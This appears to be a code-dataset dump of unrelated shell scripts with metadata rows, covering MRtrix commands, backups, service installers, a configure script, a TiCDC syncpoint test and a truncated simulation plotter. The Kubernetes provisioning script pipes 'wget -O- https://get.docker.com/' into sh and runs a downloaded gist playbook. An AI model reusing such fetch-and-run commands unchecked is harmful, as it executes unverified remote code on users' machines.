tckmap tractogram.tck -tck_weights_in weights.csv -template vis.mif -vox 1 -datatype uint16 tdi_highres.mif
tck2connectome tractogram.tck parc.mif connectome.csv -tck_weights_in weights.csv -out_assignments assignments.csv
tck2connectome tractogram.tck parc.mif meanlength.csv -tck_weights_in weights.csv -scale_length -stat_edge mean
connectome2tck tractogram.tck assignments.csv exemplars.tck -tck_weights_in weights.csv -exemplars parc.mif -files single
label2mesh parc.mif nodes.obj
meshfilter nodes.obj smooth nodes_smooth.obj
| true
|
8e601e15bd7a2576b06988515890b6c3f34c3144
|
Shell
|
indigo-iam/iam-deployment-test
|
/generate_deploy_files.sh
|
UTF-8
| 351
| 3.4375
| 3
|
[] |
no_license
|
#!/bin/bash
# Render every kubernetes/*.tmpl template with envsubst into kubernetes/.
# Requires BROWSER, DOCKER_REGISTRY_HOST and IAM_IMAGE to be exported.
set -xe
# ${VAR+x} expands to "x" only when VAR is set, so -z tests "is unset".
if [ -z "${BROWSER+x}" ] || [ -z "${DOCKER_REGISTRY_HOST+x}" ] || [ -z "${IAM_IMAGE+x}" ]; then
  echo "Environment variables BROWSER, DOCKER_REGISTRY_HOST, IAM_IMAGE are mandatory"
  exit 1
fi
# Quote the -name pattern so the shell cannot glob-expand it against the cwd,
# and read paths NUL-delimited so whitespace in names cannot split them.
find kubernetes/ -type f -name '*.tmpl' -print0 |
  while IFS= read -r -d '' file; do
    newfile=$(basename -s .tmpl "${file}")
    envsubst < "${file}" > "kubernetes/${newfile}"
  done
| true
|
978bfa55e61debdcc0c42499f4bb00bc1c0f331f
|
Shell
|
maureliofs/exercicios-shell-script
|
/Lista2/GeraBackupHome.sh
|
UTF-8
| 3,558
| 4.21875
| 4
|
[] |
no_license
|
#!/bin/bash
#########################################################################################################################################
# GeraBackupHome.sh - create a compressed backup of the current user's home directory.                                                  #
# (Exercise statement, translated from Portuguese:)                                                                                     #
#   * The backup archive is created in /home/<user>/Backup.                                                                             #
#   * Its name follows the pattern backup_home_YYYYMMDDHHMM.tgz, e.g. backup_home_201708241533.tgz.                                     #
#   * If /home/<user>/Backup does not exist, the script must create it.                                                                 #
#   * Before creating the backup, check whether a backup was already made in the last week. If so, ask the user whether to continue;    #
#     if the user declines, abort with exit code 1.                                                                                     #
#   * After generating the backup, report the name of the created file.                                                                 #
# User-facing messages below are intentionally kept in Portuguese.                                                                      #
#########################################################################################################################################
BACKUP_DIR=$HOME/Backup
BACKUP_NAME=backup_home_$(date +%Y%m%d%H%M).tgz
# Backups created within the last 7 days, if any (empty string otherwise).
DAYS7=$(find $BACKUP_DIR -ctime -7 -name backup_home\*tgz)
if [ ! -d $BACKUP_DIR ]
then
echo "Criando Diretório $BACKUP_DIR..."
mkdir -p $BACKUP_DIR
fi
if [ "$DAYS7" ] # non-empty means a backup newer than 7 days already exists
then
echo "Já foi gerado um backup do diretório $(echo $HOME) nos últimos 7 dias."
echo -n "Deseja continuar? (N/s): "
read -n1 CONT # -n1 reads a single keypress (or ENTER)
# Default (ENTER) and N/n abort; S/s continues; anything else is invalid.
if [ "$CONT" = N -o "$CONT" = n -o "$CONT" = "" ]
then
echo ""
echo "Backup Abortado!"
exit 1
elif [ "$CONT" = S -o "$CONT" = s ]
then
echo ""
echo "Será criado mais um backup para a mesma semana"
else
echo "Opção Inválida"
exit 2
fi
fi
echo "Criando Backup..."
# Archive $HOME, excluding the backup directory itself to avoid recursion.
tar czpvf $BACKUP_DIR/$BACKUP_NAME --exclude="$BACKUP_DIR" "$HOME"/* > /dev/null 2>&1
echo "O backup de nome \"$(echo $BACKUP_NAME)\" foi criado em $(echo $BACKUP_DIR)"
echo "Backup Concluído!"
| true
|
fcd80ac0c0066c654ef5d8d79298e87ce9f2a32d
|
Shell
|
nuniesmith/Scripts
|
/script8-2-4a
|
UTF-8
| 291
| 2.671875
| 3
|
[] |
no_license
|
#!/bin/bash
#This program requires that you enter arguments for item name, cost,
#selling price and inventory number on the command line.
# Append the record as a tab-separated line, then re-sort the database in
# place. `sort -o` reads all input before writing, so the same file can be
# input and output -- this replaces the original predictable /tmp/$$.tmp
# temp file (a symlink/clobber hazard) and the rm+mv dance.
echo -e "$1 \t $2 \t $3 \t $4" >> ~/hardware.database
sort -o ~/hardware.database ~/hardware.database
| true
|
0cae7aa21128f9b5f9da8a757351035a50c299be
|
Shell
|
ychen-sps/mesos-framework-demo
|
/runtime/provision/install_mesos_dns.sh
|
UTF-8
| 1,194
| 2.90625
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/usr/bin/env bash
# Install mesos-dns: build it with Go, write its config and a systemd unit,
# then enable and start the service. Idempotent: exits early if the
# mesosdns service already exists. Must run as root.
set -o errexit
set -o nounset
set -o pipefail
# BUG FIX: the original ran `sudo su` here, which spawns an interactive root
# shell instead of elevating the rest of the script. Require root explicitly.
if [[ $EUID -ne 0 ]]; then
echo "This script must be run as root" >&2
exit 1
fi
# The failing systemctl inside the && list does not trip errexit; the list
# simply short-circuits and installation proceeds.
systemctl status mesosdns >/dev/null 2>&1 && echo "Mesos DNS already installed" && exit 0
echo "Downloading Mesos DNS"
go get github.com/mesosphere/mesos-dns
mkdir -p /opt/mesosdns/bin
export GOPATH=$HOME/go
mv $GOPATH/bin/mesos-dns /opt/mesosdns/bin/
echo "Installing Mesos DNS"
# NOTE(review): "dsnon" below looks like a typo for "dnson" -- confirm
# against the mesos-dns configuration reference before changing it.
cat <<EOT > /opt/mesosdns/config.json
{
"zk": "zk://mesos.master1:2181/mesos",
"masters": ["127.0.0.1:5050"],
"refreshSeconds": 60,
"ttl": 60,
"domain": "mesos",
"port": 53,
"resolvers": ["8.8.8.8", "8.8.4.4"],
"timeout": 5,
"httpon": true,
"dsnon": true,
"httpport": 8123,
"externalon": true,
"listener": "0.0.0.0",
"SOAMname": "root.ns1.mesos",
"SOARname": "ns1.mesos",
"SOARefresh": 60,
"SOARetry": 600,
"SOAExpire": 86400,
"SOAMinttl": 60
}
EOT
cat <<EOT > /usr/lib/systemd/system/mesosdns.service
[Unit]
Description=Mesos DNS
After=network.target
Wants=network.target
[Service]
ExecStart=/opt/mesosdns/bin/mesos-dns -config=/opt/mesosdns/config.json
Restart=always
[Install]
WantedBy=multi-user.target
EOT
systemctl daemon-reload
systemctl restart mesosdns
systemctl enable mesosdns
| true
|
d31de1c82aeaa96e042b3910264fa99b61c53c57
|
Shell
|
virgo-agent-toolkit/virgo-base-agent
|
/pkg/sysv-redhat/agent
|
UTF-8
| 1,088
| 3.75
| 4
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/sh
#
# Startup script for $SHORT_DESCRIPTION
#
# chkconfig: 345 85 15 - start or stop process definition within the boot process
# description: $SHORT_DESCRIPTION
# processname: $PKG_NAME
# pidfile: /var/run/$PKG_NAME.pid

NAME=$PKG_NAME
DAEMON=/usr/bin/$PKG_NAME
PIDFILE=/var/run/$PKG_NAME.pid
LOG=/var/log/$PKG_NAME.log
# chkconfig/rc expect the subsys lock to carry the service's own name; the
# original touched the literal "process-name" (a template leftover) and
# never removed it on stop, so rc would consider the service still running.
LOCKFILE=/var/lock/subsys/$NAME

# Source function library. This creates the operating environment for the process to be started
. /etc/init.d/functions

case "$1" in
  start)
	echo -n "Starting $DAEMON: "
	daemon $DAEMON -D -p $PIDFILE -l $LOG --production --restart-sysv-on-upgrade
	echo
	touch $LOCKFILE
	;;
  stop)
	echo -n "Shutting down $DAEMON: "
	killproc $DAEMON
	echo
	rm -f $PIDFILE
	# Drop the subsys lock so rc knows the service is stopped.
	rm -f $LOCKFILE
	;;
  status)
	status $DAEMON
	;;
  restart)
	$0 stop
	$0 start
	;;
  reload)
	echo -n "Reloading $DAEMON: "
	killproc $DAEMON -HUP
	echo
	;;
  *)
	echo "Usage: $0 {start|stop|restart|reload|status}"
	exit 1
	;;
esac
exit 0
| true
|
91574880e523794e746616cfd3d523a68ab1ad71
|
Shell
|
hemanth22/k8s_Learnings
|
/kubernetesprov.sh
|
UTF-8
| 2,086
| 2.9375
| 3
|
[] |
no_license
|
# Provision a CentOS/RHEL host for Kubernetes experiments:
# prerequisite packages, Docker, libvirt, firewall rules, then a
# Kubernetes install via an Ansible Galaxy role.
echo "Initialized Prerequistie tools."
yum -y install epel-release
yum -y install wget sudo*
yum -y install figlet vim
yum -y install qemu-kvm libvirt libvirt-daemon-kvm
yum -y install ansible*
echo "Completed Prerequistie tools installation." | figlet

# Docker via the official convenience script; let "vagrant" use it
# without sudo.
echo "Initialized Docker Provision." | figlet
wget -O- https://get.docker.com/ | sh
usermod -aG docker vagrant
echo "Completed Docker Provision." | figlet

# Start + enable the container and virtualization daemons.
echo "Enabling services." | figlet
systemctl start docker
systemctl enable docker
systemctl status -l docker
systemctl start libvirtd
systemctl enable libvirtd
systemctl status -l libvirtd
echo "Completed Services are active and running." | figlet

echo "Started Network Provision." | figlet
echo "Enabling Firewall services." | figlet
systemctl start firewalld
systemctl enable firewalld
systemctl status -l firewalld
echo "Firewall Services are active and running." | figlet

# Open overlay/swarm/management ports permanently, then reload to apply.
# 4789 VXLAN, 7946 node gossip, 2377 swarm management, 2376 Docker TLS,
# 8080/80 HTTP.  (2789 — NOTE(review): purpose unclear from this script.)
echo "Adding Rules to firewall." | figlet
firewall-cmd --add-port=4789/tcp --permanent
firewall-cmd --add-port=2789/tcp --permanent
firewall-cmd --add-port=7946/tcp --permanent
firewall-cmd --add-port=2377/tcp --permanent
firewall-cmd --add-port=2376/tcp --permanent
firewall-cmd --add-port=8080/tcp --permanent
firewall-cmd --add-port=80/tcp --permanent
echo "Firewall rules configuration complete." | figlet
echo "Restart Firewall." | figlet
firewall-cmd --reload
echo "Firewall restart Completed." | figlet
echo "New Rules patch completed." | figlet
echo "Firewall Network Rules Listing." | figlet
firewall-cmd --list-port
echo "Completed Docker and Network Configuation." | figlet

# Kubernetes itself: geerlingguy's role driven by a gist-hosted playbook.
echo "Download Kubernetes modules from ansible galaxy" | figlet
ansible-galaxy install geerlingguy.kubernetes
echo "Completed downloading module" | figlet
echo "Download and install kubernetes.playbook" | figlet
wget -O kubernetes.playbook https://gist.githubusercontent.com/hemanth22/871f04f7110ff1ce60da05f9c5b1e766/raw/b28b1a24ce28605796fb56104635e1240d2d28cb/kubernetes.playbook
ansible-playbook kubernetes.playbook
echo "Completed kubernetes.playbook installation." | figlet
echo "Provision completed." | figlet
| true
|
568776eef1acec4e51e61ce0c3c45bc4619ac012
|
Shell
|
guiquanz/lemon
|
/tools/configure.sh
|
UTF-8
| 7,402
| 3.375
| 3
|
[] |
no_license
|
# Copyright (c) 2013-2014 The lemon Authors. All rights reserved.
# Use of this source code is governed by GPL license that can be
# found in the LICENSE file. See the AUTHORS file for names of contributors.
###############################################################################
#!/bin/sh
#
# Detects OS we're compiling on and outputs a file specified by the first
# argument, which in turn gets read while processing Makefile.
#
# The output will set the following variables:
# AR Archiver
# CC C Compiler path
# CXX C++ Compiler path
# CC_LD C Linker
# CXX_LD C++ Linker
# PLATFORM_LDFLAGS Linker flags
# PLATFORM_LIBS Libraries flags
# PLATFORM_SHARED_EXT Extension for shared libraries
# PLATFORM_SHARED_LDFLAGS Flags for building shared library
# This flag is embedded just before the name
# of the shared library without intervening spaces
# PLATFORM_SHARED_CFLAGS Flags for compiling objects for shared library
# PLATFORM_CCFLAGS C compiler flags
# PLATFORM_CXXFLAGS C++ compiler flags. Will contain:
# PLATFORM_SHARED_VERSIONED Set to 'true' if platform supports versioned
# shared libraries, empty otherwise.
#
# The PLATFORM_CCFLAGS and PLATFORM_CXXFLAGS might include the following:
#
# --- argument handling -------------------------------------------------
# $1 output filename, $2 directory prefix, $3 optional -f to force rebuild.
OUTPUT=$1
PREFIX=$2
FORCE=$3

if test -z "$OUTPUT" || test -z "$PREFIX"; then
    echo "usage: $0 <output-filename> <directory_prefix> [-f]" >&2
    exit 1
fi

# Delete existing output, if it exists
OUTPUT=$PREFIX/$OUTPUT
# POSIX marks "test e1 -a e2" obsolescent/ambiguous; join two tests with
# && instead.  $OUTPUT is quoted so a prefix with spaces cannot break it.
if test -f "$OUTPUT" && test -z "$FORCE"; then
    exit 0
fi
rm -f "$OUTPUT"
touch "$OUTPUT"
# Toolchain defaults: honour values pre-set in the environment, fall back
# to the conventional names otherwise.  ${VAR:=default} assigns only when
# the variable is unset or empty — same effect as the original test -z.
: "${AR:=ar}"
: "${CC:=cc}"
: "${CXX:=g++}"
: "${LD:=ld}"
CC_LD=$LD
CXX_LD=$LD

# Detect OS and machine hardware name unless the caller pinned them.
TARGET_OS=${TARGET_OS:-$(uname -s)}
TARGET_M=${TARGET_M:-$(uname -m)}

# Per-platform build settings; the big case switch below overrides these.
ARFLAGS=rcu
COMMON_FLAGS=
CROSS_COMPILE=
PLATFORM_CCFLAGS=
PLATFORM_CXXFLAGS=
PLATFORM_LDFLAGS=
PLATFORM_LIBS=
PLATFORM_SHARED_EXT="so"
PLATFORM_STATIC_EXT="a"
PLATFORM_SHARED_LDFLAGS="-shared -Wl,-soname -Wl,"
PLATFORM_SHARED_CFLAGS=
PLATFORM_SHARED_VERSIONED=true
ECHO_OPT=
# Per-platform compiler, linker and library settings.
case "$TARGET_OS" in
    AIX)
        CC=xlc
        CXX=xlC
        # BUG FIX: the original read 'ARFLAGS= -X64 rcu', which assigns an
        # *empty* ARFLAGS and then tries to run "-X64" as a command.  The
        # flags must be one quoted string.
        ARFLAGS="-X64 rcu"
        PLATFORM=OS_IBMAIX
        COMMON_FLAGS="-DOS_AIX"
        PLATFORM_CCFLAGS="-q64 -D_THREAD_SAFE -D_H_LOCALEDEF"
        PLATFORM_CXXFLAGS="-qrtti -q64 -D_THREAD_SAFE"
        PLATFORM_LDFLAGS="-brtl -bexpall"
        PLATFORM_SHARED_LDFLAGS="-b64 -G -bnoentry -brtl -bexpall"
        PLATFORM_LIBS="-lpthread -lodm -lcfg -lrt -lm"
        ;;
    Darwin)
        PLATFORM=OS_MACOSX
        COMMON_FLAGS="-DOS_MACOSX"
        PLATFORM_SHARED_EXT=dylib
        [ -z "$INSTALL_PATH" ] && INSTALL_PATH=`pwd`
        PLATFORM_SHARED_LDFLAGS="-dynamiclib -install_name $INSTALL_PATH/"
        ;;
    Linux)
        PLATFORM=OS_LINUX
        CXX_LD=$CXX
        CC_LD=$CC
        COMMON_FLAGS="-O2 -pthread -DOS_LINUX -fPIC"
        PLATFORM_LDFLAGS="-lpthread -Wl,-E -ldl"
        PLATFORM_SHARED_CFLAGS="-fPIC"
        PLATFORM_LIBS="-ldl -lm"
        ECHO_OPT="-e"
        ;;
    SunOS)
        PLATFORM=OS_SOLARIS
        COMMON_FLAGS="-D_REENTRANT -DOS_SOLARIS"
        PLATFORM_LIBS="-lpthread -lsocket -lnsl -lrt"
        ;;
    FreeBSD)
        PLATFORM=OS_FREEBSD
        COMMON_FLAGS="-D_REENTRANT -DOS_FREEBSD"
        PLATFORM_LIBS="-lpthread"
        ;;
    NetBSD)
        PLATFORM=OS_NETBSD
        CC_LD=$CC
        CXX_LD=$CXX
        COMMON_FLAGS="-D_REENTRANT -DOS_NETBSD"
        PLATFORM_LIBS="-lpthread -lgcc_s"
        ;;
    OpenBSD)
        PLATFORM=OS_OPENBSD
        COMMON_FLAGS="-D_REENTRANT -DOS_OPENBSD"
        PLATFORM_LDFLAGS="-pthread"
        ;;
    DragonFly)
        PLATFORM=OS_DRAGONFLYBSD
        COMMON_FLAGS="-D_REENTRANT -DOS_DRAGONFLYBSD"
        PLATFORM_LIBS="-lpthread"
        ;;
    OS_ANDROID_CROSSCOMPILE)
        PLATFORM=OS_ANDROID
        COMMON_FLAGS="-D_REENTRANT -DOS_ANDROID -DLEVELDB_PLATFORM_POSIX"
        PLATFORM_LDFLAGS="" # All pthread features are in the Android C library
        CROSS_COMPILE=true
        ;;
    HP-UX)
        PLATFORM=OS_HPUX
        CXX=aCC
        PLATFORM_SHARED_EXT="sl"
        COMMON_FLAGS="-DOS_HPUX"
        if test "$TARGET_M" = "ia64"; then
            PLATFORM_CXXFLAGS=" +DD64 \
                -AA \
                -Wl,-E \
                -D_RWSTD_MULTI_THREAD -D_REENTRANT \
                +W829,749 \
                -D__HP_NO_MATH_OVERLOADS \
                -D__HPACC_STRICTER_ANSI__ \
                -D__HPACC_USING_MULTIPLIES_IN_FUNCTIONAL\
                +inst_implicit_include"
            PLATFORM_SHARED_LDFLAGS="-b"
            PLATFORM_LIBS="-lpthread -lxti -lm -lrt"
        else
            PLATFORM_CXXFLAGS=" -AA +z -lstd_v2 -lCsup_v2 \
                -Wl,-E \
                -D_RWSTD_MULTI_THREAD -D_REENTRANT \
                +W829,749 \
                -D__HP_NO_MATH_OVERLOADS \
                -D__HPACC_STRICTER_ANSI__ \
                -D__HPACC_USING_MULTIPLIES_IN_FUNCTIONAL \
                +inst_implicit_include"
            PLATFORM_SHARED_LDFLAGS="-b -lc"
            PLATFORM_LIBS="-lpthread -lxti -lm -lc -lrt"
        fi
        ;;
    OSF1)
        PLATFORM=OS_COMPAQ
        CXX=cxx
        COMMON_FLAGS="-D_REENTRANT -DOS_COMPAQ"
        PLATFORM_CXXFLAGS="-D__USE_STD_IOSTREAM -D_POSIX_PII_SOCKET -D_SOCKADDR_LEN"
        PLATFORM_LDFLAGS="-pthread"
        PLATFORM_SHARED_LDFLAGS="-shared -no_archive -lc"
        PLATFORM_LIBS="-lm"
        ;;
    *)
        echo "Unknown platform!" >&2
        exit 1
        ;;
esac
# Prefer libc's memcmp over GCC's builtin: ~40% performance improvement on
# readrandom under gcc 4.4.3 on Linux/x86.
MEMCMP_FLAG=
if test "$CXX" = "g++"; then
    MEMCMP_FLAG="-fno-builtin-memcmp"
fi

COMMON_FLAGS="$COMMON_FLAGS $MEMCMP_FLAG"
PLATFORM_CCFLAGS="$PLATFORM_CCFLAGS $COMMON_FLAGS"
PLATFORM_CXXFLAGS="$PLATFORM_CXXFLAGS $COMMON_FLAGS"

# Append every discovered setting to the output file as one group, then
# show the final result on stdout.
{
    echo "CC=$CC"
    echo "CXX=$CXX"
    echo "CC_LD=$CC_LD"
    echo "CXX_LD=$CXX_LD"
    echo "AR=$AR"
    echo "ARFLAGS=$ARFLAGS"
    echo "PLATFORM=$PLATFORM"
    echo "PLATFORM_LDFLAGS=$PLATFORM_LDFLAGS"
    echo "PLATFORM_LIBS=$PLATFORM_LIBS"
    echo "PLATFORM_CCFLAGS=$PLATFORM_CCFLAGS"
    echo "PLATFORM_CXXFLAGS=$PLATFORM_CXXFLAGS"
    echo "PLATFORM_SHARED_CFLAGS=$PLATFORM_SHARED_CFLAGS"
    echo "PLATFORM_SHARED_EXT=$PLATFORM_SHARED_EXT"
    echo "PLATFORM_STATIC_EXT=$PLATFORM_STATIC_EXT"
    echo "PLATFORM_SHARED_LDFLAGS=$PLATFORM_SHARED_LDFLAGS"
    echo "PLATFORM_SHARED_VERSIONED=$PLATFORM_SHARED_VERSIONED"
    echo "ECHO_OPT=$ECHO_OPT"
    echo ""
} >> "$OUTPUT"

cat "$OUTPUT"
| true
|
b17c46f4db0615f769f01e3635363ebb324679b4
|
Shell
|
neufbox/misc
|
/efixo-base-files/files/main/etc/init.d/wan
|
UTF-8
| 995
| 3.140625
| 3
|
[] |
no_license
|
#!/bin/sh /etc/rc.common
boot() {
	# IGMP DSCP/MARK
	# Mark locally generated packets that already carry DSCP 0x2d with
	# fwmark 3 so later routing/QoS rules can match them.
	iptables -t mangle -A OUTPUT -p tcp -m dscp --dscp 0x2d -j MARK --set-mark 3
	iptables -t mangle -A OUTPUT -p udp -m dscp --dscp 0x2d -j MARK --set-mark 3
	# Femtocell
	# Only on ADSL boxes: mark forwarded UDP traffic towards each
	# configured femtocell gateway on the femto port with fwmark 3 too.
	[ -e /etc/init.d/adsl ] && {
		femto_port=`nvram get femto_port`
		for gw in `nvram list_long femto_gateway`
		do
			iptables -t mangle -A FORWARD -p udp -d ${gw} -m udp --dport ${femto_port} -j MARK --set-mark 3
		done
	}
	# Boot-time marking done; fall through to the regular start logic.
	start
}
start() {
	# ADSL-only service: nothing to do (exit, not return) on other boxes.
	[ ! -e "/etc/init.d/adsl" ] && exit 0
	dhcpc_voip_ifname=$(nvram get dhcpc_voip_ifname)
	# setup local lan IP address
	lan_ipaddr=$(nvram get lan_ipaddr)
	lan_netmask=$(nvram get lan_netmask)
	IPADDR=${lan_ipaddr}
	# ipcalc -np prints NETWORK=... and PREFIX=...; eval imports them as
	# shell variables for the iptables rule below.
	eval $(ipcalc -np ${lan_ipaddr} ${lan_netmask})
	# NOTE(review): this *deletes* (-D) a LAN_FILTER rule on start —
	# presumably clearing a rule installed by another init script; errors
	# are silenced because the rule may not exist.  Confirm against the
	# firewall setup that installs LAN_FILTER.
	iptables -D INPUT -i ${dhcpc_voip_ifname} -m state --state NEW -s ${NETWORK}/${PREFIX} -j LAN_FILTER 2>/dev/null
}
stop() {
	# ADSL-only service: bail out (whole script) on other boxes.
	[ ! -e "/etc/init.d/adsl" ] && exit 0
	# Drop every address from the VoIP DHCP interface.
	dhcpc_voip_ifname=$(nvram get dhcpc_voip_ifname)
	ip addr flush dev "${dhcpc_voip_ifname}"
}
| true
|
77fb373c639a7c6e6693a3137eed2a87e7c92131
|
Shell
|
Bramha-N/linuxShell
|
/d10-11-programing_construct/d10_flip_coin_simulation/UC1-flipCoinSimulator.sh
|
UTF-8
| 251
| 2.890625
| 3
|
[] |
no_license
|
#!/bin/bash
# Simulate a single coin flip: print the outcome and bump its counter.
# (The original shebang carried a leftover -x debug flag that spammed an
# execution trace to stderr on every run.)

Heads=0
Tails=0

# RANDOM % 2 yields 0 or 1 with (roughly) equal probability.
Flip_Coin=$((RANDOM % 2))

if [[ $Flip_Coin -eq 0 ]]
then
	echo "Head"
	((Heads++))
else
	echo "Tails"
	((Tails++))
fi
| true
|
292eaf9cdbb3ed1bcdba239e534235cff0aa6b0e
|
Shell
|
overvenus/ticdc
|
/tests/syncpoint/run.sh
|
UTF-8
| 5,406
| 3.296875
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
# Integration test: verify that TiCDC syncpoint records (stored downstream
# in tidb_cdc.syncpoint_v1) describe consistent upstream/downstream
# snapshots.  Helper functions (run_sql, check_sync_diff, ...) come from
# the sourced test_prepare file.

set -e

# Absolute directory of this script, independent of the caller's cwd.
CUR=$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )
source $CUR/../_utils/test_prepare
WORK_DIR=$OUT_DIR/$TEST_NAME
CDC_BINARY=cdc.test
SINK_TYPE=$1
CDC_COUNT=3
DB_COUNT=4
# The follow `sleep 2` make sure the ddl and dml operation can always execute during the test.
# So every syncpoint will have different data and the diff tool can judge the syncpoint's validity.
function ddl() {
	# Exercise a fixed DDL/DML workload against testSync.simple1/simple2.
	# Every statement is followed by "sleep 2" so consecutive syncpoints
	# always observe different data and the diff tool can judge each one.
	local tbl id
	for tbl in simple1 simple2; do
		run_sql "DROP table IF EXISTS testSync.${tbl}"
		sleep 2
	done
	for tbl in simple1 simple2; do
		run_sql "CREATE table testSync.${tbl}(id int primary key, val int);"
		sleep 2
		for id in 1 2 3 4 5 6; do
			run_sql "INSERT INTO testSync.${tbl}(id, val) VALUES (${id}, ${id});"
			sleep 2
		done
	done
	for tbl in simple1 simple2; do
		run_sql "CREATE index ${tbl}_val ON testSync.${tbl}(val);"
		sleep 2
	done
	# Deletes are interleaved across the two tables, as in the original.
	for id in 1 2; do
		for tbl in simple1 simple2; do
			run_sql "DELETE FROM testSync.${tbl} where id=${id};"
			sleep 2
		done
	done
	for tbl in simple1 simple2; do
		run_sql "DROP index ${tbl}_val ON testSync.${tbl};"
		sleep 2
	done
}
function goSql() {
	# Three rounds of: bulk-load with go-ycsb, then run the DDL workload.
	local round
	for round in 1 2 3; do
		go-ycsb load mysql -P $CUR/conf/workload -p mysql.host=${UP_TIDB_HOST} -p mysql.port=${UP_TIDB_PORT} -p mysql.user=root -p mysql.db=testSync
		sleep 2
		ddl
		sleep 2
	done
}
function deployConfig() {
	# Assemble conf/diff_config.toml from the two template halves, pinning
	# the upstream snapshot to $1 and the downstream snapshot to $2.
	{
		cat "$CUR/conf/diff_config_part1.toml"
		echo "snapshot = \"$1\""
		cat "$CUR/conf/diff_config_part2.toml"
		echo "snapshot = \"$2\""
	} > "$CUR/conf/diff_config.toml"
}
# Check whether the given tso falls inside a DDL job's execution window;
# if so, print that job's "start_ts commit_ts" pair.
#
# $1   - the tso to test (primary_ts)
# $2.. - flattened list of (start_ts, commit_ts) pairs
function checkPrimaryTsNotInDDL() {
	local primary_ts=$1
	shift
	# Take the pair list from *all* remaining arguments; the original
	# "tsos=$2" silently dropped every element after the first, so DDL
	# windows beyond the first were never examined.
	local tsos=("$@")
	local count=$(( ${#tsos[@]} / 2 ))
	local i start_ts commit_ts
	for (( i = 1; i <= count; i++ )); do
		start_ts=${tsos[2 * i - 2]}
		commit_ts=${tsos[2 * i - 1]}
		# Compare numerically: TSOs are integers, and the original string
		# comparison ([[ a > b ]]) misorders numbers of different lengths.
		if (( primary_ts > start_ts && primary_ts < commit_ts )); then
			echo "$start_ts $commit_ts"
		fi
	done
}
function checkDiff() {
	# Syncpoint pairs recorded downstream (parsed from the earlier
	# "SELECT primary_ts, secondary_ts" query output).
	primaryArr=($(grep primary_ts $OUT_DIR/sql_res.$TEST_NAME.txt | awk -F ": " '{print $2}'))
	secondaryArr=($(grep secondary_ts $OUT_DIR/sql_res.$TEST_NAME.txt | awk -F ": " '{print $2}'))
	# (start_ts, FinishedTS) pairs for every DDL in upstream TiDB history.
	tsos=($(curl -s http://$UP_TIDB_HOST:$UP_TIDB_STATUS/ddl/history | grep -E "start_ts|FinishedTS" | grep -oE "[0-9]*"))
	num=${#primaryArr[*]}
	for (( i = 0; i < num; i++ )); do
		# Forward the whole pair list; the original unquoted "$tsos" passed
		# only the array's first element, so later DDL windows were ignored.
		check_in_ddl=$(checkPrimaryTsNotInDDL "${primaryArr[$i]}" "${tsos[@]}")
		if [[ -n $check_in_ddl ]]; then
			echo "syncpoint ${primaryArr[$i]} ${secondaryArr[$i]} " \
				"is recorded in a DDL event(${check_in_ddl[0]}), skip the check of it"
			continue
		fi
		# Outside any DDL window: diff the two clusters at this snapshot pair.
		deployConfig "${primaryArr[$i]}" "${secondaryArr[$i]}"
		check_sync_diff $WORK_DIR $CUR/conf/diff_config.toml
	done
	rm $CUR/conf/diff_config.toml
}
function run() {
	# Syncpoint records are only written for the MySQL sink; other sinks
	# (kafka) have nothing to verify.
	if [ "$SINK_TYPE" != "mysql" ]; then
		echo "kafka downstream isn't support syncpoint record"
		return
	fi

	rm -rf $WORK_DIR && mkdir -p $WORK_DIR
	start_tidb_cluster --workdir $WORK_DIR
	cd $WORK_DIR

	# Changefeed starts from the current upstream TSO.
	start_ts=$(run_cdc_cli tso query --pd=http://$UP_PD_HOST_1:$UP_PD_PORT_1)
	run_sql "CREATE DATABASE testSync;"
	run_cdc_server --workdir $WORK_DIR --binary $CDC_BINARY
	SINK_URI="mysql://root@127.0.0.1:3306/?max-txn-row=1"
	# --sync-point makes TiCDC record a syncpoint every --sync-interval.
	run_cdc_cli changefeed create --start-ts=$start_ts --sink-uri="$SINK_URI" --sync-point --sync-interval=10s

	# Generate the workload, then wait for the tables to replicate.
	goSql

	check_table_exists "testSync.USERTABLE" ${DOWN_TIDB_HOST} ${DOWN_TIDB_PORT}
	check_table_exists "testSync.simple1" ${DOWN_TIDB_HOST} ${DOWN_TIDB_PORT}
	check_table_exists "testSync.simple2" ${DOWN_TIDB_HOST} ${DOWN_TIDB_PORT}

	# Let several sync intervals elapse so multiple syncpoints accumulate.
	sleep 60

	run_sql "SELECT primary_ts, secondary_ts FROM tidb_cdc.syncpoint_v1;" ${DOWN_TIDB_HOST} ${DOWN_TIDB_PORT}
	echo "____________________________________"
	cat "$OUT_DIR/sql_res.$TEST_NAME.txt"
	# Verify every recorded syncpoint pair, then a final full diff.
	checkDiff
	check_sync_diff $WORK_DIR $CUR/conf/diff_config_final.toml

	cleanup_process $CDC_BINARY
}
# Always tear the cluster down, whatever the exit path.
trap stop_tidb_cluster EXIT
# "$@" forwards each CLI argument as its own word; the original unquoted
# $* re-split any argument containing whitespace.
run "$@"
check_cdc_state_log $WORK_DIR
echo "[$(date)] <<<<<< run test case $TEST_NAME success! >>>>>>"
| true
|
f1d3e153b0c6ceba833d0786732104aebe255879
|
Shell
|
flaviovdf/webp2p-ufcg
|
/WebP2P-Simulator/sim_plotter.sh
|
UTF-8
| 898
| 4.03125
| 4
|
[] |
no_license
|
#!/bin/sh
# Record the directory containing this script in $SELF.
find_self() {
    SELF=$(dirname "$0")
}
# Print the usage line and abort.
usage() {
    printf 'usage %s <sim.properties files> <sim type> <param to vary> < values[] || -seq <first> <last> <inc> >\n' "$0"
    exit 1
}
#MAIN
# Run the simulator NRUNS times for every requested value of one property,
# rewriting the .properties file for each value and archiving each log.
if [ $# -lt 3 ]; then
    usage
fi

find_self

FILE=$1
TYPE=$2
PARAM=$3
OPTION=$4

if [ ! -r "$FILE" ]; then
    echo "cannot read $FILE"
    exit 1
fi

NEWPROP=/tmp/sim.prop.tmp

shift 3
VALUES=$*

# "=" (not the bashism "==") keeps this portable under #!/bin/sh; dash
# rejects "==" inside [ ] with "unexpected operator".
if [ "$1" = "-seq" ]; then
    if [ $# -lt 4 ]; then
        usage
    fi
    FIRST=$2
    LAST=$3
    INC=$4
    VALUES=$(seq $FIRST $INC $LAST)
fi

NRUNS=100

for newparam in $VALUES; do
    for i in $(seq $NRUNS); do
        echo "simulator.log simulator_${PARAM}-${newparam}_RUN-${i}.log"
        rm -f simulator.log
        # Replace "PARAM = <number>" with the value under test.
